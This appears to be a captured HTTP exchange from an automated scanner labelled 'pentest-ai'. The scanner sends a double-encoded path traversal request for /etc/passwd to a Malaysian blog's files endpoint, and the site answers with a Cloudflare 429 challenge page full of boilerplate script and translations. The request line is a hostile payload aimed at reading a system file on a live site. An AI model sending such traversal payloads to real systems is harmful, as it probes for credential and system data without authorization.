REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9920
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b4f9c59a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=jddPfA%2BHBRApafA%2BnnrmR0KJw2%2F6%2BOrXWMBo7c4qsW%2FR9dfMPtRB2gWG4NXHrS5Pg8r6nxgD7lhp1jAWGIxoz8UVR4zuMsXzcIc9giQgx97gXijd6f9dOHFws4v%2FySxt5nvMI52E7ufXzXNLJg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b4f9c59a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'OipWrZWYk9ixAaAGooLE3ZjwPdswb9EBcK0eLBrN3ww-1784280665-1.2.1.1-DXcLYM6iQxbCj229jBnGGiSfCdVB70PRWdGuYgqiwiNTjVuTx.ET2MSdSe05xPtX',cITimeS: '1784280665',cRay: 'a1c83b4f9c59a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=0RkrzN6Tgz0.gDPsIvvUKfA3bthHXfiLry6ZNuPbdzg-1784280665-1.0.1.1-HUL1nTfR7dVxf30AcJXfAQUsbCrykukNMroFK5ZiB3Y",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=0RkrzN6Tgz0.gDPsIvvUKfA3bthHXfiLry6ZNuPbdzg-1784280665-1.0.1.1-HUL1nTfR7dVxf30AcJXfAQUsbCrykukNMroFK5ZiB3Y",md: '8B42pJiJUkDKUBAyUy4CU4D52TJUueeBtqstxnCX_EQ-1784280665-1.2.1.1-63EphEWvkSFbJAQd.hsrbcrKn2QqfTZUUvAxhSmUDj.s_xG9YY9eEfCZrQVTrFU3kyx4RWG4t3xxvMQY0t22Hni1MYJ6ZRBiAG1WWJyvishMSXrOdcUp_vscUCNa7C4pc3zh_.FSKu0BXH45HoA3KFxOcgCZFIhlXF1ODye0RNFmdN9Yxyt5hNFl5mCqrfILMOIx_nOxIETchNjnWERgeZRABM_LLaZ0PC2ia8S1vHaPywc_ZHu9Ghl5OMThAMZOpr.StEjRurOLPZLceRsIOkuNLp1q30gRV6cEd2.vtMnRkEgDp1JAgMc2gdAswH0nts1fQK8itbYCv84xtaeD5eh9nWr3orQ0CfXway.IiHYRX5bFqW6dlmLUoJz_oRVBa603coDDwgY_Gs_4x9wgBFcViLTxXCo.z44Mdz7FjMQ4PVnKilaon0uzBW7im1PqiD91IseNZNE..1JD7PkCk1imyurXIMKPcODObYml.9XeFTS8fQwMt6.tHA_oQWelUXVn46wnNzqXTmHB3ZDSk8fVsa4sw_FzkH76vmSaT9lkUo925KdINJCER7hKkygL5FUCezhCHrcZuH73tSIOeAUk0BzFpUzuG.UUfaWBwjgCMe7WEJ8Faq8yGp36jD7f8Ao7jYb0wUnVczoHH0cgwYhnfzA_nUnQkCxttkRHwRa3bO8NI9CsCmyLDnXdNno7SBT9wgY90NREEOD8dx6Q2OlEHz9rSKomnpPm.p.QoPieUbl1Ts43FW_R20HvgRIAdEIvorGapvbXQbgtS6.E3tuLqWzuRxiRqHUvF9AHX7LzUHi8A0.chyeCDXZa_LxukVb4A4du_FYX8WwqLy24t3WEdarOiYS51mZNO2SWvy.RNxlfBMucXqIblEDYzl57get0zOEOG9WAys7_ixkmLRvPVE1y5UZFV43V_YoIU6lPdn9RkPa.7JlFljumVs2mT4HdBrwxEwb5.PkZwIkSTi6PhqtEqEV3PYgg_KLpOyiQPgbkLN1alokhb1ZZ1M2OK33QYsSEzeFZQ8SZLkKDmJ8sM05vGf0gXqcM97jLBvrLEY85wSsYp4Bk36uTTbZkXzk_LASla0LuP7qimI8RLtk0aHEVaFj_i2iWn45._qjl5FwA6qc4NvOfYkuE5lTm0Do8S97uP_MbupObX_8FzY8OtRL5v2l.BFwb0Yjz0YkvplO3a1C.QtUcNB0.XBkJl5ag9wWnhW3u_CTP308goLkm9BcKrtJkqLYB93KlsgHON1DJ4GI1K4zXDVsUyGv_Voq0w5R73t7dkX6xZVYWnSQJg6CZKNrJorzYkZuloheUUfD6U8YFuV62zqLpiGYuaZRMEm6CmikJzGb7Wc9nbRHIVNgjUPxy6LA.dYKdDgs',mdrd: 'uUZ2PPHo2xAvUmV2TbHPEYJ.PUyz3fEZwFNJ6bnyC5k-1784280665-1.2.1.1-BRp.Xt2O0AmQOenY3e84YPrCe8mxVJbw5D4_5tmMbbcV3ATmTqkr1T23hxtqEARxgSTifND08IfFnjFGsdkE2YT4M1FPr6jUXPoJztKvd80jjBU0ks7tnLPt7b6lanFesSef2mvETL.AicGQnMSQm.T4TyDXYutojGESwd9JhNABGwWIJpAbZObiqH5vg3zbIqIsp4vXDNjPD2hTK0Op0fx8LDX58NOSow9.D6TRFnngid6DFSln4JXhvypksh.R',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b4f9c59a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=0RkrzN6Tgz0.gDPsIvvUKfA3bthHXfiLry6ZNuPbdzg-1784280665-1.0.1.1-HUL1nTfR7dVxf30AcJXfAQUsbCrykukNMroFK5ZiB3Y"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
